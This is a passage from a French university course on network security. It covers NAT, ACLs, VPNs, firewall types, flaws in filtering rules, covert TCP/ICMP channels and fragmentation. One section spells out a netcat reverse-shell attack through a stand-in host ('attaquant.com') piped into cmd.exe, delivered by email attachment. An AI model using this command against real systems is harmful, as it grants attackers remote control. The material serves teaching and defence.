Le NAT viole dlibrment ce principe en r-crivant les en-ttes des paquets IP, ce
qui peut poser des problmes dans les deux situations suivantes :

Les protocoles qui changent des adresses : certains protocoles changent


des adresses IP parmi les donnes changes. Lun des cas typiques de ce type
de fonctionnement est celui du protocole de transfert de fichiers FTP. Cest
travers de commandes sur une connexion de contrle que le client et le serveur
vont ngocier sur quel port de quelle adresse IP vont tre transmises les donnes
changes. Si un client translat demande au serveur douvrir la connexion sur
une adresse prive (qui correspond dans ce cas son adresse relle), le serveur
sera dans lincapacit de contacter cette adresse puisquelle est prive. Un autre
cas typique est celui du protocole H323, essentiellement utilis pour la visioconfrence, et qui intgre dans ses champs protocolaires des informations sur les
adresses IP et les ports TCP des machines. Dans ce cas, il est alors ncessaire
de mettre en place un Proxy, ou relais, protocolaire, qui reconstruira proprement
les protocoles de communication en fonction des rgles de translation.

Le chiffrement et lintgrit des donnes : si les paquets transmis contiennent


des donnes chiffres, le mcanisme de translation dadresses ne pourra aller
substituer des adresses ventuellement prsentes dans les donnes. En outre,
certains protocoles intgrent un marquant dintgrit cryptographique afin de
dtecter une modification des paquets en cours de transit : une modification des
champs dadresses constitue une atteinte en intgrit du paquet et sera donc
dtecte comme telle par les quipements terminaux, qui le rejetteront.

Le filtrage dans les routeurs daccs


Limmense majorit des routeurs aujourdhui disponibles dans le commerce intgre des
fonctions de filtrage. Ces filtres sont classiquement implments au travers de listes
contrle daccs ou ACLs (Access Control Lists).
Une ACL est gnralement constitue dune table deux entres : la premire entre
indique un critre et, la seconde, un traitement associ ce critre.
Les critres les plus couramment retenus sont :

Ladresse source,
Ladresse destination,
Le port source,
Le port destination,
Le type de protocole (IP, TCP, UDP, ICMP)

12

Dans les faits, quelques rares champs peuvent tout de mme tre modifis par les quipements
intermdiaires ; le champ TTL par exemple est dcrment chaque seconde de transit ou, plus
pragmatiquement, chaque traverse dun routeur.
92

CNAM Jean-Christophe GALLARD

La prsence, ou labsence, de certaines options ou flags (SYN, ACK, FIN, RST,


URG)
Linterface Ethernet du routeur filtrant sur laquelle est reu le paquet, et le sens
(entrant ou sortant du routeur)

Lorsquun paquet reu par lquipement de filtrage correspond lun des critres
slectionns, le systme peut alors lui appliquer un ou plusieurs traitements particuliers :

Acceptation,
Refus,
13
Absorption ,
Routage forc,
Cration dun vnement dans les journaux systmes
Tunnel (voir plus loin),
Translation dadresse ou de port

Notons que, dans la plupart des cas de figure, les ACLs sont traites selon un mcanisme
dit de first match : lorsquun paquet rseau est intercept, le systme de filtrage
balaye les rgles une une, dans lordre, et, lorsquune rgle doit tre applique, traite le
paquet en consquence puis sort de sa boucle de traitement. Le positionnement dACL
peut donc parfois savrer dlicat mettre en uvre et reste souvent une source
derreurs.

Le Tunnelling IP (VPN)
Le tunnelling IP, galement appel VPN (Virtual Private Network) est une technique
permettant deux entits (machines et/ou rseaux) de communiquer entre elles de
manire sre via un rseau public considr comme non protg.
La fonction VPN permet une extension du domaine de confiance de son rseau ; elle est
par ailleurs souvent utilise en entreprise pour linterconnexion de deux agences, ou pour
permettre des clients nomades de continuer travailler distance sur le systme
dinformation de son entreprise.
Les mcanismes VPN utilisent gnralement un chiffrement de bout en bout pour offrir
des canaux de communications scuriss. Il est galement possible de mettre en uvre
une protection contre les attaques en intgrit, en utilisant des algorithmes
cryptographiques.

13

Labsorption se distingue du refus en ce sens quen cas de refus, lmetteur est gnralement
averti (segment RST ou paquet ICMP de type port unreachable par exemple). Une absorption
de paquet ne donne aucun retour dinformation lmetteur
93

CNAM Jean-Christophe GALLARD

Les solutions de VPN actuelles offrent une certaine souplesse dans leur utilisation. Il est
possible de chiffrer tout ou partie du trafic, et en fonction de certains paramtres (source,
destination, service utilis).
Le tunnelling peut galement intervenir sur diffrentes couches protocolaires :

Niveau 2 : PPTP, L2TP (gnralement dans le cas de clients nomades se


connectant un serveur daccs distant par modem)
Niveau 3 : IPV6, IPSEC (pour du pur chiffrement IP sur une infrastructure de
communication existante)

Il existe pour lessentiel deux mthodes de tunnelling :

Chiffrement des champs de data TCP / UDP:


Le champ de data du paquet IP est chiffr (ventuellement sign) en sortie de
rseau interne, puis le paquet est transmis pour tre dchiffr lorsquil arrive sur
le rseau de destination. Cette technique est la plus simple mettre en uvre,
mais elle ne permet pas de se prmunir efficacement contre un rejeu des
paquets, et, les en-ttes IP restant en clair, un attaquant peut alors identifier les
machines en communication (mais pas les services utiliss). Cette technique peut
parfois ouvrir la voie des attaques dites clair connu .

Encapsulation IP sur IP :
Le principe de cette technologie consiste chiffrer / signer lintgralit du paquet
en sortie de rseau, puis intgrer ce paquet chiffr dans un paquet IP dont la
source est le botier de chiffrement source et la destination, le botier de
chiffrement du rseau de destination.
A rception du paquet, le botier de chiffrement du rseau de destination dchiffre
le contenu du paquet, vrifie sa cohrence et r-met le paquet la machine de
destination. Un pirate interceptant les communications ne verrait alors passer
quun seul flux rseau, entre les deux botiers de chiffrement, ce qui permet donc
de raliser un masquage de sa topologie de rseau interne. Il sagit bien
videmment de la technique la plus scuritaire, et est utilise par exemple par les
protocoles IPSEC.

94

= >
7

C7

;4

/
8

Dfinition

Une dfinition formelle du Firewall a t propose par Cheswick et Bellovin dans leur
ouvrage Building Internet Firewalls :
Un Firewall est un lment ou un ensemble d'
lments plac entre deux
rseaux et possdant les caractristiques suivantes :

tous les flux (entrant et sortant) passent au travers

seuls les flux autoriss par une politique locale peuvent passer

le systme lui-mme est rsistant aux agressions

Un pare-feu est gnralement dfini comme un lment ou un ensemble dlments


permettant dassurer le respect dune politique de contrle daccs entre deux rseaux.
Plusieurs technologies existent pour atteindre cet objectif, et plusieurs architectures
peuvent tre mises en uvre. Un pare-feu nest cependant pas loutil de protection
universel :

il ne pare que certaines catgories de menaces (par exemple, il ne protge pas


tel quel des virus),
il ne protge que si le flux rseau transite par lui (problme des attaques internes
ou des connexions pirates),
il ne peut saffranchir du systme dexploitation sur lequel il repose,
il peut contenir des portes drobes (BackDoors) ou des failles (conception ou
implmentation).

Types de Firewall
Historiquement, les pare-feux se partageaient entre deux familles :

les pare-feux de type routeur filtrant (le filtrage du trafic se fait au niveau des
couches rseau et transport), voluant vers une technique dite stafeful
inspection permettant de grer dynamiquement ltat des sessions en cours,
les pare-feux de type mandataire, effectuant une analyse syntaxique et
smantique au niveau applicatif pour un certain nombre de protocoles. Un certain
nombre de ces derniers sont issus de la technologie TIS de Gauntlet.
95

CNAM Jean-Christophe GALLARD

La plupart des pare-feux combinent aujourdhui ces deux approches de manire plus ou
moins fine. Un pare-feu est gnralement constitu des lments suivants :

un ordinateur (le plus souvent de type PC ou station de travail) muni dau moins
deux interfaces rseaux,
le systme dexploitation de lordinateur, se partageant le plus souvent entre Unix
(Solaris, UnixBSD, Linux, etc.) et Windows NT, pouvant tre scuris
(durcissement) lors de la phase dinstallation du pare-feu,
le logiciel de pare-feu lui-mme.

Cependant on trouve galement :

des botiers de type blackbox (appliance), munis de plusieurs interfaces rseau,


intgrant un systme dexploitation et un logiciel de pare-feu pr install, le
logiciel de pare-feu pouvant tre spcifique au constructeur (Firebox de
Watchguard) ou relever dun diteur tiers (module FW-1 de Checkpoint)
des routeurs filtrants intgrant des fonctions de pare-feux propritaires (IOS
Firewall de Cisco) ou tout ou partie des fonctions dun logiciel tiers (routeurs
Nokia avec FW-1)
des logiciels de pare-feu embarqus au niveau du poste de lutilisateur (Norton
Firewall par exemple), appels aussi pare-feux personnels.

Filtrage couche basse


Le filtrage couche basse constitue un premier niveau de filtrage lmentaire, il sattache
vrifier une politique de scurit au niveau du simple paquet rseau.
Prsent dans limmense majorit des routeurs en tant que mcanisme optionnel, il est
utilis simultanment avec les mcanismes de routages de base.
La technique du filtrage couche basse prsente de nombreux avantages. Souvent bas
sur des composants matriels, le traitement des paquets demeure rapide et assure de
bonnes performances de llment actif qui limplmente. De plus le mcanisme est
gnralement totalement transparent pour lutilisateur final.
En revanche, nagissant que sur les couches basses du rseau (couches 3 et 4) le filtrage
reste limit ces seules couches : les protocoles de communication de plus haut niveau
ne peuvent donc tre filtrs selon leur contenu.

Filtrage applicatif
Notion de Proxy

Le principe du filtrage applicatif, ou mandataire, consiste assurer une mdiation entre


deux rseaux, par linsertion dun quipement intermdiaire, obligatoire, et qui assure une
fonction de relayage (Proxy).
Vu du serveur, cest le relais qui interroge le serveur et non directement le client final, ce
qui correspond, dune certaine manire, un mcanisme de translation dadresse de
niveau applicatif. Le Proxy peut tre totalement transparent pour lutilisateur (on utilise
pour ce faire un mcanisme dinterception), mais le plus souvent son emploi ncessite un
paramtrage particulier du client pour quil puisse lutiliser.
Travaillant au niveau applicatif, le contenu protocolaire est interprt et peut alors tre
filtr plus efficacement : il devient ainsi possible dautoriser ou dinterdire des commandes
protocolaires (interdiction de la commande PUT sur FTP par exemple), dinterdire le
transfert de certaines donnes (blocage des JavaScript dans une connexion HTTP,
filtrage sur URL) et mme dauthentifier le client (le bon acheminement de la requte
est alors soumis une authentification pralable).
96

CNAM Jean-Christophe GALLARD

Ce dernier point (connaissance de lutilisateur mettant une requte), permet alors un


filtrage plus fin et plus labor quun simple filtrage de paquets.
Bien souvent, le service de Proxy est associ un mcanisme de cache (surtout pour
le protocole HTTP), permettant doptimiser les performances rseau.
Les nombreuses options dun tel mcanisme en font un outil particulirement puissant et
performant en termes de scurit :

Journalisation des vnements plus fine,


Remontes dalertes plus volues,
Gestion des quotas de flux et priorisation par utilisateur ou par type de service,
Masquage de la topologie de son rseau interne,
Capacit grer des statistiques

La contrepartie de ce meilleur niveau de filtrage rside cependant dans la ncessit de se


procurer autant de services Proxy quil existe de protocoles applicatifs relayer : le
mcanisme de Proxying est alors spcifique chaque protocole. Dans le cas o lon
souhaiterait relayer un service non support, il devient alors ncessaire de dvelopper
14
son propre Proxy, ce qui peut savrer une contrainte lourde .
Les faibles performances rseau des services de relais, du fait de lobligation de raliser
un dcorticage protocolaire onreux en ressources CPU, tendent cependant
abaisser la bande passante disponible.
Enfin, si lon souhaite agir au niveau de lutilisateur, le systme devient moins transparent
vis vis de lutilisateur final qui doit alors interagir avec le systme, au moins durant la
phase dauthentification initiale.

Les Proxys inverses

Jusqu maintenant, les concepts de Proxys ont t vus dans la perspective dun client
qui souhaite traverser un Firewall pour atteindre un serveur. Or, les serveurs internes aux
entreprises sont eux-mmes souvent protgs par un Firewall. On peut donc avoir besoin
dun Proxy permettant des clients externes daccder un serveur interne.
La principale diffrence rside dans le fait que, dans le premier cas, le client sait o se
trouve le Proxy et est configur pour lutiliser, alors que, dans le second cas, le Proxy doit
tre totalement transparent et rpondre la place du serveur.
Gnralement, on procde de la manire suivante : ladresse du Proxy est dclare dans
le DNS cot extrieur comme tant le serveur que lon souhaite atteindre. Les requtes
pour le serveur sont donc rceptionnes par le Proxy qui se charge alors de relayer les
requtes.
Dans la plupart des cas (serveurs HTTP et DNS par exemple), les champs protocolaires
ne comportent pas toujours le nom ou ladresse du serveur. Ainsi, et pour ces protocoles,
les Proxys inverses ne peuvent relayer du trafic que pour un seul serveur interne.
Enfin, les Proxys inverses peuvent galement tre utiliss comme acclrateurs de trafic
(Proxy accelerators) : dans ce cas, le Proxy inverse fait galement office de cache,
conservant une copie locale de tous les fichiers transitant par lui. Sil reoit une requte
pour un fichier qui est dans son cache et sil sait que ce fichier est toujours valide, le
Proxy peut rpondre la requte sans dranger le serveur. Ceci permet donc le partage
de charge entre le Proxy et le serveur original.

14

Il existe toutefois des services de Proxy gnriques (Socks Proxy par exemple) permettant de
relayer des services non supports, mais lefficacit du filtrage sen ressent fortement.
97

CNAM Jean-Christophe GALLARD

Le Statefull Inspection ou filtrage tat


La technique du Statefull Inspection, constitue un mariage de raison entre les deux
techniques de filtrages prcdemment dcrites : elle se caractrise principalement par sa
capacit grer ltat dynamique des connexions, du fil lapplication .
Il sagit ici de la technologie la plus labore en matire de filtrage rseau, et qui permet
une scurisation particulirement performante.
Les Firewalls Statefull, peuvent intervenir chaque niveau des couches rseaux et
grent alors dynamiquement un contexte de session permettant de suivre la trace les
connexions rseau.

Cette technique est par ailleurs la seule qui permet de grer efficacement le problme de
la fragmentation

Gestion de la fragmentation
Le mcanisme de la fragmentation IP, pourtant parfaitement connu et
intgr dans les spcifications du protocole IP, nest pas sans poser de
nombreux problmes de scurit.
Afin dillustrer les problmes de filtrage lis lutilisation de la
fragmentation IP, nous imaginerons la situation suivante :
Soient :

1 machine interne A
1 machine externe B
un Firewall

On interdit les connexions de B vers A sur le protocole HTTP (port 80) et on autorise le
reste.
B envoie A un paquet IP de trs grande taille contenant un segment TCP adressant le
port 80
Les routeurs intermdiaires vont filtrer le premier segment car len-tte TCP du fragment 1
contient ladressage du port 80

98

CNAM Jean-Christophe GALLARD

...mais les autres fragments vont passer car ils ne contiennent pas den-tte TCP !
Dans le cas o lquipement de rseau intermdiaire aurait t un Firewall Statefull ,
ce dernier aurait filtr le premier segment, mais galement les suivants puisquil aurait eu
la possibilit de reprer que ces segments additionnels constituaient la suite du premier
segment. En outre, si le premier fragment ntait pas arriv en premier, le Firewall aurait
attendu larrive de lensemble des fragments avant de traiter la connexion, ce quaurait
t incapable de faire un simple routeur filtrant puisque travaillant seulement au niveau
des paquets.

99

CNAM Jean-Christophe GALLARD

0 *
2

E
=
"

"3
*

Gnralits
Comme dit prcdemment, un Firewall nest pas loutil de protection absolu. Leur fonction
principale de filtrage rseau peut se dfinir comme linspection, au regard de critres
varis, des flux de communication dans le but de juger de leur adquation une politique
de scurit dfinie.
Cependant, lefficacit du filtrage retenu dpend principalement des type de flux
inspecter, des performances attendues mais galement de la pertinence des critres
dinspection face une menace considre.
Si lon observe lvolution des technologies rseaux au cours de ces dernires annes, on
remarque que le nombre de critres ncessaires une bonne interprtation des flux na
cess de crotre ; alors quil y a dix ans, on se contentait de juger les flux sur les
adresses, les types de services et les flags TCP/IP, il est dsormais indispensable de
mettre en uvre un filtrage tat, tant au niveau des protocoles de communication euxmmes (tat des sessions TCP, suivi de fentre) que des protocoles applicatifs.
Une telle surenchre sexplique simplement par lvolution des techniques de
contournement qui se sont peu peu adaptes aux nouvelles technologies de contrles
mises en place.
Pour un attaquant, jouer avec les limites des quipements de filtrage rseau revient alors
exploiter les erreurs dimplmentation, les mauvaises interprtations des standards ou
plus simplement les limitations intrinsques des outils de protection ; lobjectif ultime de
lattaquant consiste donc formater son flux rseau de manire le rendre licite vis--vis
de la politique de filtrage.

Rgles de filtrage trop laxistes


Le tableau suivant spcifie un ensemble de rgles de filtrages permettant un serveur de
messagerie (en 10.0.0.1) dmettre et de recevoir du courrier lectronique :
Source

Port

Destination

Port

Protocole Action

any

any

10.0.0.1

25

tcp

Permit

10.0.0.1

25

any

any

tcp

Permit

10.0.0.1

any

any

25

tcp

Permit

100

CNAM Jean-Christophe GALLARD

Source

Port

Destination

Port

Protocole Action

any

25

10.0.0.1

any

tcp

Permit

any

any

any

any

any

Deny

La rgle 1 spcifie que tout le monde (expression any) peut mettre sur le
port TCP SMTP du serveur.
La rgle 2 est une rgle dite de retour , autorisant les rponses aux
requtes des clients
La rgle 3 prcise que le serveur peut atteindre tout autre serveur de
messagerie
La rgle 4 est la rgle de retour de la rgle 3
La rgle 5 permet dinterdire explicitement toute autre connexion, dans les
deux sens.
Aussi simple quil soit, cet ensemble de rgles contient pourtant dj une erreur, car il est
plus permissif quil devrait ltre. En effet, la rgle 4 autorise toute machine se connecter
au serveur et ce quel que soit le port de destination pour peu que le port source soit le
port 25. La rgle 2 va galement autoriser les rponses ce type de requtes. Ainsi, il
suffira un attaquant de choisir systmatiquement le port 25 comme port source de ses
requtes pour scanner lensemble des ports de services du serveur.
On peut contrer ce type dattaque en ajoutant aux rgles de filtrage une vrification sur les
flags TCP, permettant ainsi de dterminer le sens de la connexion sachant quune
rponse une requte aura toujours le flag ACK positionn. Les rgles de notre exemple
prennent alors la forme suivante :
Source

Port

Destination

Port

Protocole

Flags

Action

any

any

10.0.0.1

25

tcp

any

Permit

10.0.0.1

25

any

any

tcp

ACK

Permit

10.0.0.1

any

any

25

tcp

any

Permit

any

25

10.0.0.1

any

tcp

ACK

Permit

any

any

any

any

any

any

Deny

La solution nest par contre pas parfaite. En effet, si un attaquant parvient forger un
segment TCP contenant le flag ACK de positionn, destination du serveur, avec un port
source gal 25 et sur un port quelconque du serveur, la rgle 4 autorisera lentre dun
tel paquet.
Certes, le serveur de destination renverra lmetteur un segment RST mais il devient
alors possible de crer un canal cach ou une saturation de la bande passante sur le
rseau interne voire, dans le pire des cas, un dni de service par saturation de la pile TCP
/ IP du serveur.

Ordonnancement des rgles de filtrage ; first match


Dans les situations o lon dispose de nombreuses rgles de filtrage, il devient impratif
de bien les organiser. Il se peut en effet quune rgle sense interdire un service soit sans

101

CNAM Jean-Christophe GALLARD

effet, si une rgle prcdente, plus gnrale, a dj autorise le service et ce en raison du


mcanisme de first match dj dcrit.
Le tableau suivant spcifie des rgles de filtrage pour une architecture dans laquelle un
routeur filtrant autorise toute communication vers un serveur sur tous les ports de services
infrieurs 1024, sauf les ports HTTP et SMTP.

Source

Port

Destination

Port

Protocole Action

any

any

Serveur

<1024 tcp

Permit

15

any

any

Serveur

80

tcp

Deny

16

any

any

Serveur

25

tcp

Deny

36

any

any

any

any

any

Deny

Si lon spcifie les rgles dans cet ordre, tout le monde pourra accder aux ports HTTP et
SMTP, contrairement ce que lon souhaitait faire. En effet, les rgles 15 et 16 devraient
linterdire, mais, la rgle 1 tant rencontre en premier, celle-ci est applique et
lalgorithme de traitement sachve sans avoir balay les deux rgles 15 et 16.
Pour obtenir un filtrage efficace, les rgles 15 et 16 auraient donc d tre positionnes
avant la rgle 1.

Canaux cachs TCP - IP


Le filtrage sans tat prsente des lacunes qui permettent des intrus dtablir des canaux
de communications de manire relativement simple.

ACK Channel

Pour discriminer le sens dune connexion TCP, un firewall sans tat dtectera la rponse
un segment prcdent par la prsence du flag ACK. Tout segment de ce type sera donc
considr comme valide, puisque tant le rsultat dun segment prcdent, cens avoir
pass avec succs le filtrage rseau.
Il suffit alors de nutiliser que des segments ACK pour faire transiter de linformation au
travers dun tel quipement de filtrage. Un outil comme ackcmd permet, sous Windows,
dexploiter un tel canal de communication bas sur ce principe.

Ping Channel

Dans une requte ICMP de type Echo Request (ping), un champ est rserv pour des
donnes optionnelles. Ce champ est gnralement rempli avec des octets de bourrage
dpendant du systme dexploitation (sous Windows ce champ contient une table des
caractres ASCII : ABCDEFGH).
Il est donc possible dutiliser ce champ pour tablir un canal de communication entre deux
entits spares par un systme de filtrage laissant passer le ping.

102

CNAM Jean-Christophe GALLARD

ICMP Channel

Lutilisation abusive dun champ optionnel dans ICMP peut tre facilement contre par un
systme de filtrage intelligent ; il suffit dcraser les donnes prsentes dans ce champ
lors de lopration de filtrage.
Dautres techniques utilisant ICMP ont alors t implmentes pour mettre en uvre un
canal de communication cach. Lorsquune erreur ICMP est reue par le firewall, ce
dernier devrait vrifier systmatiquement que ce message se rapporte bien une
communication en cours en consultant sa table dtats.
De nombreux systmes de filtrage nimplmentent cependant un tel contrle lmentaire
et il devient alors trivial de mettre en uvre un canal de communication exploitant cette
fonctionnalit.
La difficult pour ladministrateur consiste choisir un juste milieu dans sa politique de
filtrage. Sil se montre trop laxiste, il sexpose des attaques en dni de service et
ltablissement possible de canaux cach. En revanche, sil se montre trop rigide, il risque
de filtrer des messages ICMP indispensables au bon fonctionnement du rseau.

Suivi de fentre TCP

Le suivi de fentre TCP est une technique de filtrage consistant surveiller et vrifier
lvolution correcte des numros de squence et dacquittement en fonction de la taille
des fentres TCP ngocies linitialisation de la connexion.
Cette technique dinspection demeure cependant assez coteuse mettre en place pour
les dveloppeurs de firewall, et nombre dquipements de filtrage nimplmentent pas de
telles mesures.
Le principe dtablissement dun canal cach de cette nature consiste, dans un premier
temps, tablir une connexion valide travers le firewall de faon crer un tat.
Ensuite, on envoie des paquets hors squence contenant les donnes du canal.

R acheminement de ports
Les techniques de r-acheminement de ports sont souvent utilises pour contrer les
protections d'
un Firewall entre un attaquant et sa cible ; elles consistent injecter des
commandes entrantes dans un canal de communication sortant dune cible. Afin de mieux
illustrer ce type d'
attaque, voici la description d'
une telle attaque utilisant l'
utilitaire netcat
configur manuellement.
Un pirate souhaite atteindre une machine Windows dispose derrire un mur pare-feu qui
n'
autorise que les connexions sortantes de la victime vers l'
extrieur, et uniquement sur
les ports 80 (HTTP) et 25 (SMTP).

103

CNAM Jean-Christophe GALLARD

L'
attaque ncessite trois pr-requis :

1. l'
attaquant doit avoir configur un serveur telnet sur sa propre machine, coutant
sur le port 80 : cette opration est ralise avec l'
utilitaire netcat en utilisant la
commande nc -vv -l -p 80,
2. l'
attaquant doit avoir configur un serveur telnet sur sa machine, coutant sur le
port 25 : cette opration est ralise avec l'
utilitaire netcat en utilisant la
commande nc -vv -l -p 25,
3. l'
attaquant doit pouvoir faire excuter par sa victime la ligne de commande
suivante :
nc attaquant.com 80 | cmd.exe | nc attaquant.com 25
Cette dernire opration peut tre effectue en envoyant sa victime un e-mail contenant
une pice jointe malicieuse (cette pice jointe pourra prendre la forme d'
un programme
contenant le code de l'
utilitaire netcat et un script - ou un autre programme - ralisant la
commande prcdemment cite).
En lanant la commande prcise au point 3, la victime initie une communication telnet
sur le port 80 de l'
attaquant. Les donnes en provenance de ce port de service sont alors
rediriges vers un interprteur de commandes MS-DOS de la victime, et la sortie standard
des commandes passes sont rediriges vers le port 25 de l'
attaquant.
Vue de l'
attaquant, l'
attaque se prsente de la faon suivante :

L'
attaquant dispose de deux consoles, l'
une hbergeant le serveur telnet sur le
port 80 et l'
autre hbergeant le serveur telnet sur le port 25.
Lorsque la victime lance la commande fatale, l'
attaquant peut alors saisir des
commandes dans la premire fentre et rcuprer les rsultats dans la seconde.

Les commandes saisies dans la premire fentre sont renvoyes au premier client netcat
de la victime, elles sont rediriges dans l'
interprteur de commandes local de la victime et
la sortie standard de l'
interprteur est alors redirige vers le second client netcat de la
victime, d'
o le fonctionnement dcrit.

104

CNAM Jean-Christophe GALLARD

Gestion de la fragmentation
Fragmentation IP et filtrage sans tat

Dans le cas de la fragmentation IP, seul le premier fragment contient une en-tte TCP
valide, ce qui signifie quun systme de filtrage sans tat ne peut prendre de dcision
rflchie pour les autres fragments.
Il en rsulte que la seule solution possible consiste laisser passer tous les fragments
sans contrle autre que celui des adresses sources et destination. Ce problme a
cependant t rsolu ds lapparition du filtrage tat.

Recouvrement de fragments

Lune des premires techniques de contournement de firewalls a consist utiliser la


possibilit offerte de recouvrement de fragments. Les premiers firewalls implmentant la
gestion de la fragmentation basaient leur dcision sur les informations contenues dans le
premier fragment, puis appliquaient la mme dcision aux fragments suivants.
Partant de ce principe, une attaque classique consiste alors mettre un premier
fragment conforme la politique de filtrage, puis les fragments suivants viennent
craser le premier fragment, gnrant ainsi un segment final non-conforme la
politique de filtrage, maishlas trop tard pour tre dtect.

Protocoles ports ngocis


Alors que la plupart des applications reposent sur une connexion TCP ou un flux UDP
simple, nutilisant quun seul port de service, dautres ncessitent ltablissement en cours
de session dautres flux rseaux dont les paramtres peuvent tre ngocis.
Pour un outil ne permettant pas de comprendre et de suivre ces ngociations, filtrer de
tels flux relve dun vritable casse-tte, et il est alors souvent ncessaire douvrir plus
que de raison sa politique de filtrage.
Le protocole FTP est le prcurseur de telles applications puisque, en plus dune
connexion sur le port 21 du serveur, il utilise une seconde connexion ddie au transfert
de donnes, et dont les paramtres sont ngocis. Cette seconde connexion est
normalement initie par le serveur, depuis son port TCP 20, vers le client et sur un port
TCP haut (i.e. suprieur 1023) fourni par le client. Pour que lopration se passe sans
problme, il est alors ncessaire dautoriser le serveur tablir une telle connexion
entrante vers le client, ce qui revient autoriser le monde entier se connecter
nimporte quel port haut de sa plage dadresse.
Afin de grer finement un tel problme il convient donc dquiper le systme de filtrage
dun module spcifique et destin suivre les paramtres de cette ngociation pour
ouvrir, en temps rel et au plus strict, les filtres ncessaires.

105

CNAM Jean-Christophe GALLARD

Le cas particulier de FTP nest pas isol ; il existe de plus en plus de protocoles
fonctionnant avec des ports de services ngocis comme lIRC (Internet Relay Chat), le
H323 et les systmes dchanges peer to peer.
Pour lIRC, le protocole autorise ltablissement de communications directes entre les
clients (mode DCC) :

Lorsque Bob envoie une requte DCC au serveur, il lui fournit galement le port sur lequel
il va couter pour cette connexion entrante. Le serveur retransmet les paramtres de
cette requte Alice, qui ouvre ensuite une connexion sur la machine de Bob et sur le
port ngoci.
Pour quun firewall laisse passer cette dernire connexion entrante, il lui faut donc suivre
la requte DCC de Bob et ouvrir temporairement le port choisit par Bob, avec cette
difficult que ladresse IP de Alice nest connue que du seul serveur IRC. Dans ce cas de
figure, il est impossible douvrir le canal slectivement en nautorisant QUE Alice se
connecter.

Canaux cachs applicatifs


Une autre technique pour tablir un canal de communication cach consiste dtourner
lusage normal dun protocole autoris. Ainsi, si la consultation Web est autorise, on
pourra se servir de lautorisation pour tablir une connexion TCP sortante vers un service
quelconque coutant sur le port 80.
Lattaquant doit alors remonter les couches rseau : ce nest au niveau TCP que stablira
son canal, mais au niveau du protocole applicatif lui-mme.
Pour lutter contre un tel dtournement de la politique de filtrage, il convient donc de
vrifier que les donnes changes sur les ports de service correspondent bien au
protocole considr. Mais une telle protection a toutefois ses limites ; il reste possible
dtablir un tel canal tout en tant conforme aux spcifications du protocole en question, le
canal cach se logeant dans les paramtres applicatifs :
http://www.truc.com/ceci/est/un/canal/cach/

106

CNAM Jean-Christophe GALLARD

;
2;

;
,

Prambule
La grande majorit des systmes dinformation mis en place dans les entreprises est
supporte par des rseaux locaux, sappuyant sur des protocoles de type TCP/IP.
Interconnecter ces systmes ne pose pas de difficults techniques, de nombreux types de
produits rpondant ce besoin.
La difficult majeure relve de la mise en place de solutions de scurit, pour ouvrir
laccs un systme, pour des changes dinformations autoriss, en le protgeant des
accs non autoriss, malveillants ou des erreurs dutilisation.
La solution de scurit choisie, doit permettre dassurer, la confidentialit, lintgrit et la
disponibilit des informations ou services sensibles de lorganisation concerne contre un
ensemble de menaces, dorigine interne ou externe. La scurit est un sujet qui devra
tre abord de manire systmatique et mthodique ; tout comme on ne scurise pas un
btiment simplement en posant des serrures aux portes, on ne scurise pas une
interconnexion en plaant simplement un Firewall en entre de son rseau.
La ralit est en effet plus complexe : nen dplaise certains responsables de systmes
dinformation, il nexiste pas de solution gnrique de scurisation applicable en tout
temps et en toutes circonstances. On nchappera donc pas lanalyse pralable
autorisant la meilleure adquation de la solution retenue au problme pos.
On trouvera en fin de chapitre un certain nombre darchitectures de scurit typiques pour
linterconnexion de rseaux locaux : il va de soi que ces architectures ne constituent
quune base de travail, quil conviendra dadapter larchitecture existante et au niveau de
scurit requis.
Lors de ltude dune interconnexion il sera ncessaire daborder les axes suivants :

un axe stratgie scurit (enjeux, organisation, etc.)


un axe architecture d'
accs
un axe scurit des changes
un axe scurit des services (serveurs / postes)

Ces quatre axes, trs diffrents, doivent tre analyss de faon cohrente.
Les actions mener lors dune interconnexion sont listes ci aprs:

Identifier les utilisateurs concerns.


Identifier les flux autoriss.
Protger les machines exposes.
Prvoir une organisation capable d'
en assumer l'
administration

107

CNAM Jean-Christophe GALLARD

Ce dernier point demeure souvent le point le plus critique dune interconnexion, dune part
parce que ladministration de la scurit dun systme dinterconnexion ncessite de
solides comptences et dans de nombreux domaines, et dautre part parce que la charge
dune telle administration (en termes de ressources humaines mais galement
financires) nest pas ngligeable.
Enfin, rappelons que, tout au long de la mise en place dune interconnexion de rseaux, le
responsable devra avoir en mmoire chaque instant un principe de base de la scurit :
tout ce qui nest pas explicitement autoris est interdit

Routeurs ou Firewalls ?
Lune des premires questions que se posent les responsables dune interconnexion est
de savoir quel type de matriel il est prfrable dutiliser pour assurer la scurit de
linterconnexion. Techniquement, il nexiste gnralement que deux rponses ce type
de question : routeurs filtrants ou Firewalls.
La rponse nest malheureusement pas aussi simple quelle en a lair. On serait tent de
rpondre brutalement quun Firewall, offrant un niveau de scurit plus lev quun
routeur filtrant, est prfrable (qui peut le plus peut le moins !), mais chaque systme a
ses propres avantages et inconvnients.
Les routeurs filtrants possdent un avantage financier certain dans la mesure o ceux-ci
sont dj gnralement en place dans linfrastructure existante. Bien souvent, il suffit
dactiver les options de scurit de ces routeurs pour assurer une scurit satisfaisante.
En termes de performances, un routeur sera gnralement plus efficace quun Firewall
dans la mesure o il repose sur un matriel ddi, spcifiquement dvelopp pour le
besoin. Cependant, les routeurs possdent des limites :

Les ACLs sont fastidieuses crer et tenir jour par les administrateurs, mme
sil existe dsormais des interfaces dadministration graphiques volues,
Les routeurs sont d'
autant plus ralentis que les ACL sont plus longues (mais cest
galement le cas de Firewalls),
Les routeurs sont des machines sans capacit de stockage (disque ou disquette),
et donc ne peuvent pas assurer de journalisation importante du trafic,
Leur ergonomie d'
administration est fruste,
Les routeurs ne sont pas programmables, et ne peuvent donc hberger des
fonctions de scurit adaptes aux cas particuliers des entreprises.

Ce sont souvent ces limitations, plus quune meilleure scurit densemble, qui amnent
prfrer le choix dun Firewall pour une interconnexion scurise.
En effet, les Firewalls ont tendance offrir un niveau de scurit suprieur celui des
routeurs filtrants, au dtriment du niveau de performance en terme de bande passante
(syndrome du goulet dtranglement), mais les rcentes volutions des routeurs et des
Firewalls rendent difficile une telle classification, la frontire entre les deux types de
technologie se faisant de plus en plus floue :

Il existe des Firewalls matriels rivalisant en termes de performances avec les


routeurs actuels (Cisco PIX),
Certains routeurs intgrent dsormais des fonctionnalits de Firewall (NAT,
Proxys applicatifs, VPNs),
Il existe des produits spcifiques qui permettent de dporter certaines fonctions
jusquici assumes par les Firewalls (botiers de chiffrement, serveurs
dauthentification),
De plus en plus de routeurs intgrent des fonctionnalits dauthentification, de
chiffrement, de translation dadresse et de services de relais.

108

